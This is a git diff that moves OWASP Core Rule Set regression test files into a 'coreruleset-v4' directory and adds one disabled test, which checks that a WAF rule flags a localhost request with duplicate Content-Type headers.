rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920410.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920451.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920460.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920500.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920520.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920521.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920530.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920600.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920610.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml
new file mode 100644
index 000000000..7fa4b050c
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml
@@ -0,0 +1,17 @@
+---
+meta:
+ author: "Andrea (theMiddle) Menin"
+ enabled: false
+ name: "920620.yaml"
+ description: "Tests for 920620"
+tests:
+ - test_title: 920620-1
+ desc: Multiple Content-Type request headers
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ encoded_request: "R0VUIC9nZXQgSFRUUC8xLjENCkhvc3Q6IGxvY2FsaG9zdA0KVXNlci1BZ2VudDogT1dBU1AgQ1JTIHRlc3QgYWdlbnQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24NCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veG1sDQoNCg=="
+ output:
+ log_contains: "id \"920620\""
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
similarity index 100%
